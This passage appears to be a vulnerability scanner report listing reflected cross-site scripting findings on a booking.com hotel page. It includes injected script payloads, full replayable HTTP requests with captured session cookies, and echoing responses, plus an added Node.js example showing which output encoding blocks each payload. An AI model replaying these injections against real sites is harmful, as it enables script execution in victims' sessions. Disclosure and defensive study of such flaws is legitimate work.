<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16175d4"><script>alert(1)</script>4d50fc21cb9&checkout_year_month=2011-10&lang=en">
...[SNIP]...

4.176. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4451b"><script>alert(1)</script>1469f7d8f2b was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-104451b"><script>alert(1)</script>1469f7d8f2b&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:45 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74m327rSMm5c9JJEUOw2zQiSbjMQslasKIWsdewz%2F0VtJrj6umhESuXzc0fkjQalnYW%2BjCxtcNs59JoWNTzpFVjz%2FO20YOLaoB703xAwP1zWMK0CNvhJZNpVSG4HrTIjcdVh%2FVa4LPdb%2BGyY4nSbjX5jW5rBCg78zAEetjQZ4UOIAgCE5n%2BDv92KF%2BJCvkqQ%2B7%2BiGHrkwXbwtRCS9lNDjP7BoqaO8u2o6V5ZFmo0H%2FD%2FS1qmzc3TVFrpVnob4rDJgGRvHbyDTrrfT4RV6CkN4PNr7iNPesDaWZ0pVK5mmwk1ImMgg0KQaCebITwpRVYoSalCV7jD7dx9pFpn0xt%2Bw5CYChu3JwAegqla6CbCf61LGT98GDff8OcNH6RaNd8Le%2Bhso%2FU5jPb39RBsMdLGFQOqXKwQ4TVNalCGa9JoFX9WdRJbeljh4C3cynu6pQb9DdhOYuua82gpUbrcpRwo5rI8rQ49cyMEdWwFIlurabxIbeuklyNdt6jYh8mU0avk7pZ8uFxzXejbHq3BbZy%2FxspMAp%2B2r%2FGAUjYyDurcS8ccrvCrIRNi4HErQjA58dLfjM30eysHjuFzVA5FxD85sIROQppsB7j2di9syHmNRAWJQie91qdfUW9xUBfGVEP1KfI6WWn%2F%2FJdVwT91UfljBNuN%2BY0ihMzgT0jYkK478QcYMZ%2BeIZvw4lnjxtPFqh1HrfHy9TRgIko5Ua990t%2B337r8RiAFAPHv1rfWa6SOVf%2BDwaxP8KYvkwQzm3iFSg3Maw%2B%2FaqzDdYxngHLGBAfMeiHWoPUeI2lHeQGZXdV08x7raNeKKC0QQxqfXt%2FI7svqJt7zxRUxyz6q9bequriy3pw%2F%2BRQlQNzShRSKwgzh4ZQP4YyCJaJ9IZHZksFpsDiJOvnytyy9Lhq%2FvSK2E%2FYZlgedG2997tY7EuIZIQHJz3IC4lDT%2Bob0uL21JyBkO%2FNDBDShylEJIyuWGurPbSlDqmLU6gnPi0gSKNZOXm6sNPPRsEm6%2FQ0hBR6uSgKlhxh5om1iRXsM7KHDcy0C6wvgl8wZUHMep6Xr0S8%2BsKl%2BaIckC76fdgDYWfSyvGkdYs0IlCRLvgILydb5vnRAVaMsKaOo3pyEsu3%2FpAV2dpYIzrz8SeraD4f8m7VGrXS8HmoyCii6SpE%2FIMkF6XDrlnZw%2FuXOcW9vL2EHduQgsd%2Bt1MvN7zX7VOhSJvzQL5aBnhMR5zzbcGwi30YT5kH69oHfvXs4Idl%2BD1kD9K%2FHn82%2FXBAmVMV9ZjV%2BAyTF%2Bnt2ndsUDSi6OpqA3al3B6bcpRUJQOaJI%2FCfUN%2BUNxiyjd1W8quF3oRQIsAt30Vod5B8vKaiuagqZEuXKM3xGtixpsv3eTlCA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:45 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224043
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-104451b"><script>alert(1)</script>1469f7d8f2b&lang=en">
...[SNIP]...

4.177. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8903c</script><script>alert(1)</script>c0693d7ea4 was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-108903c</script><script>alert(1)</script>c0693d7ea4&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:16:10 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGbFMKGxhLGxcV8JgVcsNPdwFrYE9stqnMmO6fnezme%2FSKovCgD%2FmghVroj8%2Fv94KVF6nxVdJXxbxsoyyUKiMxk%2BHqWhhgecDSoZbfT3IgB%2Bys5JhVUx09wv%2FCvqgNFA3NTgOGzPpI21kul0Km944LAkGjdCk98wlfQJBQIMubVfwwTOiRjuhNTdmO3Arzv5TP%2B554VEudje40Z8cfyqZ06Lc4QvCHW5ttNGQ%2BIad7noRujQlQVCKhyWKOE6Eo1n3N6aR6certxqGl38fEJzkQPbYn1qGOItUUm%2FOYEMIq%2FyMr4VDvz%2Be4RfapT9%2Bez%2BNVYQ%2Bdlv87DkdXvN%2BbnMOdMzpEXWhAH9qNjlZ71rvXXvJrfbGJg8Kro8dJq9Bx22pxeX5puEOANM7mDjSVTGQfv6cZg2iJpy66pGhA4c1tnsFtS1oVGn3Z%2BFIBA01R3VhaI60xAxg587Tf%2BBN0Nb832D9CwPqiPsrDAjr01J8Lhew%2FvLEiX9GCG9tszA3SXlesk3QQeA6gN2xThCdpUEcKKpn9wBASP6irw%2Bm0CcMtCp%2BZK%2FdgOEG%2Bq1vrdS2h2GMq9rTCdVsS6VpM8frDZq6fwhbw68G6LavMuIKDc6STqUtTh91C6oovmRh%2Fvgz6VpegApFBpvWwg7hyJohSQPigg1eoBT9awgqDlxbXiOf3pO9FGTVbsXbOp9fHXdgqbXpiu6rkEYMvK4%2FH5EpYBbC9NQjADPtg84ePxV5JFOlABqQbM37dsyNq5Xeif5YUQEOJplrOfb4QMvNShvWBMqrymM0f42gK4RHlnEXNz8n4dCp2yPQJuqtJ9nj36s2hlfkqQ2127YunPFfVi3HMuHp3FRc3%2BNrwCZY%2BuDZbufxU7RAdqv47PNvHl25xb5IockAUmOF6uKctTXqYlSF1e74jyXFHia3dnn0Yt1r4xpbzP0gUMzwLRLqeMa1zSAPcGd77V%2Fm%2FRHzqwrJlbtr8Lqa5qNAbFkjgEmAWECF2YkQoishg3MJU%2B7tKcnXZ5CTMDwihNISVs%2F090qrz5nEUpn7ZkSq3iBqehiPbb8JGNTTeWtyiswipidbaKe6duKMpPlEnOOYSmoDPCPi0YEk%2B8Ydfml21N2f8PreRCrc%2BsCHlbedGR3Z2%2FNGSYhSDLBMOMGfpoIulF5PqkbPQKVexT1vdLmDx2fCKO4edo%2BtM%2BjMoDqOhmBITSxn6Q5DDhgVguSFDglk626voZ3Ejad4HA3APyYB9l9ZXMT0HKjZIy%2FHuNxyIj8wx4FXAA5WqZgUtbs6sdOEIqG51PYBRwFjWWr71s%2BvqKea35FZiybbjAhhaYCdJlRN%2BoAoGnB59mhpDFRfr%2BdlJGrsmZgSPQ4fBdeFzMw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:11 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224062
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-108903c</script><script>alert(1)</script>c0693d7ea4&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin_monthday=14;checkin_year_month=2011-10;checkout_monthday
...[SNIP]...
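
The findings on this host fall into two reflection contexts: a single-quoted JavaScript string inside an inline script block (4.173, 4.174, 4.177) and a double-quoted HTML attribute value (4.175, 4.176 and 4.178 below). The Node.js script that follows is an added example written for this report; it is not code from Burp Suite, XSS.CX or booking.com. It feeds the scanner's own payloads from the findings above through an assumed page template (the report shows only the reflected fragment, so the variable name b_url, the href attribute and the link text are assumptions), shows why escaping quotes or using JSON.stringify alone still lets the script-context payload close the script element, and shows the output encoding that contains each context.

```javascript
// Added example for this report (not code from Burp, XSS.CX or booking.com):
// why the two reflection contexts in findings 4.173-4.178 are exploitable and
// which output encoding closes each one. The page templates below are assumed;
// the report only shows the reflected fragments.

// Payloads copied from the findings above (constructed test input for this file).
const JS_PAYLOAD = 'da324</script><script>alert(1)</script>03dbfbc3f4c'; // 4.173
const ATTR_PAYLOAD = '175d4"><script>alert(1)</script>4d50fc21cb9';     // 4.175

// The HTML tokenizer closes a <script> element at the first "</script" it
// meets, whatever the JavaScript quoting state. A second <script> element in
// the rendered output therefore means the payload escaped the string literal.
function countScriptElements(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// --- Context 1: single-quoted JavaScript string inside an inline <script> ---

// Assumed vulnerable template: raw query value dropped into a JS string.
function renderUnsafeScript(value) {
  return `<script>var b_url = '${value}';</script>`;
}

// Common partial fix: escape backslashes and quotes only. Still exploitable,
// because the payload never needs a quote to close the script element.
function renderQuoteEscapedScript(value) {
  const v = String(value).replace(/\\/g, '\\\\').replace(/'/g, "\\'");
  return `<script>var b_url = '${v}';</script>`;
}

// JSON.stringify alone is also not enough: it leaves "<" and ">" intact.
function renderJsonOnlyScript(value) {
  return `<script>var b_url = ${JSON.stringify(String(value))};</script>`;
}

// Correct: JSON-encode, then turn every HTML-significant character (plus the
// JS line terminators U+2028/U+2029) into a \uXXXX escape. The JS engine
// decodes the escapes, so the script receives the original value, while the
// HTML tokenizer never sees a literal "<", ">" or "&".
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}
function renderSafeScript(value) {
  return `<script>var b_url = ${jsStringLiteral(value)};</script>`;
}

// --- Context 2: double-quoted HTML attribute value ---

// Assumed vulnerable template: raw query value inside an href attribute.
function renderUnsafeAttr(value) {
  return `<a href="/hotel/us/c-boston-massachusettes.html?checkout_monthday=${value}">Check availability</a>`;
}

// Correct: entity-encode the five characters that can end an attribute value
// or start a tag. Single quotes are covered so the same encoder is safe for
// single-quoted attributes as well.
function attrEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafeAttr(value) {
  return `<a href="/hotel/us/c-boston-massachusettes.html?checkout_monthday=${attrEncode(value)}">Check availability</a>`;
}

// Reads the href value back the way a browser would: up to the next double
// quote. A value shorter than what was injected means the payload closed the
// attribute (and, in these findings, the tag).
function extractHref(html) {
  const m = html.match(/href="([^"]*)"/);
  return m ? m[1] : null;
}

// Runs every template against the scanner payloads and reports which ones
// leave a second <script> element or a truncated attribute in the output.
function demo() {
  return {
    unsafeScript: countScriptElements(renderUnsafeScript(JS_PAYLOAD)),       // 2: broke out
    quoteEscaped: countScriptElements(renderQuoteEscapedScript(JS_PAYLOAD)), // 2: still broke out
    jsonOnly: countScriptElements(renderJsonOnlyScript(JS_PAYLOAD)),         // 2: still broke out
    safeScript: countScriptElements(renderSafeScript(JS_PAYLOAD)),           // 1: contained
    roundTrip: JSON.parse(jsStringLiteral(JS_PAYLOAD)) === JS_PAYLOAD,       // true: value preserved
    unsafeAttrHref: extractHref(renderUnsafeAttr(ATTR_PAYLOAD)),             // ends at "...=175d4"
    unsafeAttrScripts: countScriptElements(renderUnsafeAttr(ATTR_PAYLOAD)),  // 1: injected tag
    safeAttrScripts: countScriptElements(renderSafeAttr(ATTR_PAYLOAD)),      // 0: contained
  };
}

console.log(demo());
```

Run it with node; demo() returns one result per template. Note that the responses above set the bkng cookie with HTTPOnly, so an injected script cannot read that cookie through document.cookie; it can still act in the victim's session, for example by issuing same-origin requests, so the flag narrows the impact of these findings without removing it.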

4.178. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the do_availability_check request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dafb4"><script>alert(1)</script>c6316da2516 was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ondafb4"><script>alert(1)</script>c6316da2516&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:35 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIswHTSe13ijTp3EbixcL7lLKWRxAbVo9ABtd8t9Co%2FpH5JfBUJX0Zs9A69Ugv%2F4dXTroIXDYelVqebWVX1f4AB%2FyOZT2AnYch8bkyfhNGHuvAjyF%2BSfsyGhCrlXdpWmxLTzsxYpNz0LKsmBeUuR7MSHIOoekmE37%2B897C14i3%2BE2LT9%2FsDZf7FxCBI43nk%2B5nLfyboof8eK1ZefCCt3oRzOiZuQoHxAToVWD1hJ82PS2pvUIhsvDTM2q6aBfTaYzC03Ky3TWQyriguA2q3kUWjMDnLK3EsF7d8dVrC%2ByTCT8pcUuCFTZLJLuRBJ5sbxBvyClKKm7lnN4t5yovnlQeddS%2FD5mk5%2FcfJb9IBtZa3BfA8d537Jkr1%2BfXGL5smeYsAGrJhmQ8pjgrhDtYEJcJU05ng0KApGigNRQo21F0mWW1eQBudwgy30%2F0RnLegpPa5tktv7OiTnA519ClGebiTafGdDf%2FoB6kTL%2FUzFsHds%2FQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:35 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232245
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

